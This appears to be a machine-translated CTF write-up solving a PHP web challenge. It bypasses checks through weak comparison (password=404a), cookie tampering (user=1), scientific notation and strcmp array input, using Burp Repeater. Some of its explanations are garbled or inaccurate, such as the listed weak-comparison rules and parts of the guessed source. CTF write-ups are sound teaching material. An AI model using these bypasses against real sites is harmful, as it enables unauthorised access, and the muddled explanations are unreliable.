Question environment:
FLAG NEED YOUR 100000000 MONEY
Flag needs your 100,000,000 yuan
F12 Take a look at the source code:
if (isset($_POST['password']))
{<!-- -->
$password = $_POST['password'];
if (is_numeric($password))
{<!-- -->
echo "password can't be number"
}
elseif ($password == 404)
{<!-- -->
echo "Password Right!
}
}
PHP code audit:
Two parameters password and money passed through POST method
The isset function determines whether the parameter exists and whether the value is empty. If it exists or is not empty, it returns TRUE.
The is_numeric() function is used to detect whether a variable is a number or a numeric string; it should be noted here that the meaning of a numeric string is a literal string composed of numbers, such as: “123456789”
If it is a number or a string of numbers, “password can’t be number” will be output.
If password is 404, the password is correct
When password is 404, although the second elseif statement is satisfied, the first if statement is not satisfied.
Because 404 is a number and a string of numbers
If you want to satisfy the first simplicity, just make the password a normal string, 404a, 404b, 404c, 404, 404, 4040, etc.
In this way, the second condition is also met. Why? (Convert the value to a numeric string during comparison)
“==” is the PHP weak comparison logical operator
PHP weak comparison:
Weak comparison in PHP is a method of comparing two values for equality, but it does not perform a strict equality comparison between the two values. Instead, it allows certain types of values to undergo automatic type conversion when compared.
Weak comparisons use the following rules:
- If two values are Boolean, they are considered equal as long as they are both true or false.
- If two values are both integers or floating point numbers, they are considered equal as long as their values are equal.
- If both values are strings, they are considered equal as long as their length and sequence of characters are the same.
- If two values are arrays or objects, they are considered equal as long as they have the same structure (keys and values) and the same order.
- If two values are null, they are considered equal.
- For other types of values, weak comparisons are performed using PHP’s == operator.
Pass parameters and use burpsuite to capture packetspassword=404a & amp;money=100000000
First perform POST parameter transfer through the Firefox browser plug-in Max HackBar, and then capture the packet. In this way, the data packet is the POST parameter transfer method. If the GET method parameter transfer method is changed to the POST method parameter transfer method directly in the data packet, it may still be the GET method. When passing parameters, you need to pay attention to this.
Right click Repeater->Send to replay
Only student users can purchase FLAG
Note Cookie:user=0
user is the user, 0 usually represents false (error), 1 usually represents true (correct)
We change user to 1 so that the background program can run normally
Modify user=1
Continue Send for replay
Users and passwords are bypassed
Number length is too long
Your number is too long
Here I thought of Using scientific notation to bypass
1e9 means there are 9 0s after 1 => 1000000000 > 100000000 (larger than the money value required by the question!)
The conditions are met and the number length is not too long.
Bypass money using scientific notation:password=404a & amp;money=1e9
When money=1
you have not enough money,loser
you don’t have enough money
After testing the money parameter in different situations, there are three types of output results.
- When money => 100000000
- Output “Nember lenth is too long”
- When money < 100000000
- Output “you have not enough money, loser”
- When 1e9 <= money <= 1e999999 (saying when money becomes an array)
- Output “flag value”
I guess the function strcmp() is used to compare two strings, and it can also compare the number of characters in the two strings.
strcmp(string1,string2)
- 0 – if the two strings are equal
- <0 - if string1 is less than string2
0 – if string1 is greater than string2
So when the filtering is improper and incomplete, you can bypass it by changing the parameters into an array. In this case, comparison cannot be made and true will be returned directly
Here is a bold guess at his background source code:
<?php
$flag=100000000;
$Flag='flag{0c531ed2-9c1e-479a-adcb-d975b1376ca6}'
if (isset($_POST['money'])) {<!-- -->
if (strcmp($_POST['money'],$flag) == 0)#Compare the value and number of characters of money and flag, "=="PHP weak comparison logical operator
echo $Flag;
elseif(strcmp($_POST['money'],$flag) < 0)
print 'you have not enough money,loser';
else
print 'Nember length is too long';
}
?>
Bypassing money via arrays:password=404a & amp;mony[]=0
Halfway through, the Repeater in my 2023 version of Burp disappeared. I asked the masters here. I don’t know what happened now, so I used the 2021 version of Kali to do the questions again. It’s bitter.
Get flag:flag{cb3acdc3-dcda-49d0-9597-b7247f9c6ff0}